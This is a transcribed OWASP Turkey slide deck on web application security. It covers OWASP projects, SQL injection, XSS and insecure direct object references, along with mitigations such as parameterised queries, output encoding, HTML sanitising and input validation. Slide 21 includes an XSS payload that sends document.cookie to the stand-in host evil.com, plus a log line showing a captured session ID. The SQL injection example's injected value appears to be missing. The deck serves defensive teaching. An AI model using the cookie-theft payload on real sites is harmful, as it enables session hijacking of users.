This document provides an overview of SecureYourApp and OWASP (Open Web Application Security Project). It introduces Bünyamin Demir, the founder of SecureYourApp and leader of OWASP Turkey. It then discusses various OWASP projects like the OWASP Top 10, ZAP Proxy, and Application Security Verification Standard. Finally, it covers some common web application vulnerabilities like injection, XSS, and insecure direct object references, providing examples and mitigation techniques like input validation.

1. SecureYourApp
OWASP-Turkey
Bünyamin Demir

2. Bünyamin Demir ( @bunyamindemir )
– Lisans Kocaeli Üni. Matematik Bölümü
– Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı
Güvenliği
– Uygulama Geliştirici
– OWASP Türkiye Bölüm Lideri
– Sızma Testleri Uzmanı
• Web, Mobil, Network, SCADA, Wireless,
Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi
• Kaynak kod analizi
– Eğitmen
• Web/Mobil Uygulama Güvenlik Denetimi
• Güvenli Kod Geliştirme
• Veritabanı Güvenliği
2

3. 3
OWASP

4. 4
Why is OWASP Special?

5. • OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide
5
OWASP Projects

6. 6
OWASP ZAP Proxy / WebScarab

7. 7
Application Security Verification Standart

8. Application Security
8
Two weeks of
ethical hacking
Ten man-years
of development
Business
Logic
Flaws
Code
Flaws
Security
Errors

9. Attacker vs. Defender
9

10. Web Application Threat Surface
10

11. 11
OWASP TOP 10

12. A1 - Injection
12

13. Anatomy of SQL Injection Attack
13
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) &
“’ AND password = ‘” & Request
(“password”) & ”’”
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’

14. Anatomy of SQL Injection Attack
14
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND
password = ‘ ” & Request(“password”) & “ ’ ”
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password =
causes all rows in the users table to be returned!

15. Bind Parameters (PHP)
15
$stmt = $dbh->prepare(”update users set
email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);

16. Parametrized Query (.NET)
16
SqlConnection objConnection = new
SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
"SELECT * FROM User WHERE Name = @Name
AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name",
NameTextBox.Text);
objCommand.Parameters.Add("@Password",
PassTextBox.Text);
SqlDataReader objReader =
objCommand.ExecuteReader();

17. Prepare Statement (Java)
17
String newName = request.getParameter("newName") ;
String id = request.getParameter("id");
//SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE
EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
//HQL
Query safeHQLQuery = session.createQuery("from
Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);

18. A3 - XSS
18

19. A3 - XSS
19

20. Anatomy of XSS Attack
20
http://www.davshan.loc/friends.php?search=<abc>
<p>Result for <b><abc></b> :0<p><br />
http://www.davshan.loc/friends.php?search=<script>alert(1);</script>

21. Anatomy of XSS Attack
21
<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>
187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5
HTTP/1.1" 200 7425 "http://www.davshan.loc/....

22. OWASP Java Encoder Project
22
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED)
%>" />
<%-- Javascript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- Javascript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED)
%>');">click me</button>

23. Rich Text
23

24. OWASP HTML Sanitizer Project
24
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);

25. JQuery.Encoder
25
…
$(function() {
$(".div
[name="+$.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1)+"]"));
});
…
encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS
$('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');

26. A4 – Insecure Direct Object References
26
• Attacker notices his acct
parameter is 6065
?acct=6065
• He modifies it to a nearby
number
?acct=6066
• Attacker views the victim’s
account information
https://www.onlinebank.com/user?acct=6065

27. Best way to SecureYourApp
27
Input Validation

28. Input Validation - Java
28
public boolean validateUsername(String username) {
String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
if (username == null) {
return false;
}
Pattern p = Pattern.compile(usernamePattern);
Matcher m = p.matcher(username);
if (!m.matches()) {
return false;
}
return true;
}
if (!validateUsername(username))
{
//invalid username
}

29. Input Validation - .NET
29
if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.s]{1,10}$"))
{
// sinif ismi uygun değildir
}

30. 30